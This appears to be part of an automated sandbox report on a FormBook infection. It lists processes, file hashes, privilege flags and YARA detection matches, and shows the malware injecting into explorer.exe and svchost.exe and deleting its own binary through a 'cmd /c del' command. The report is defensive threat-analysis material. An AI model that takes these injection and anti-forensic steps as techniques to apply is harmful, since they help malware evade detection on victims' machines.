                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                    Imagebase:0xf70000
                                                    File size:687616 bytes
                                                    MD5 hash:9F2C198407F1A7D058C06CC174817DB6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:11:12:51
                                                    Start date:15/09/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\Public\vbc.exe
                                                    Imagebase:0xf70000
                                                    File size:687616 bytes
                                                    MD5 hash:9F2C198407F1A7D058C06CC174817DB6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:11:12:53
                                                    Start date:15/09/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0xffa10000
                                                    File size:3229696 bytes
                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    General

                                                    Start time:11:13:05
                                                    Start date:15/09/2021
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                    Imagebase:0x830000
                                                    File size:20992 bytes
                                                    MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:11:13:09
                                                    Start date:15/09/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                    Imagebase:0x4a3f0000
                                                    File size:302592 bytes
                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >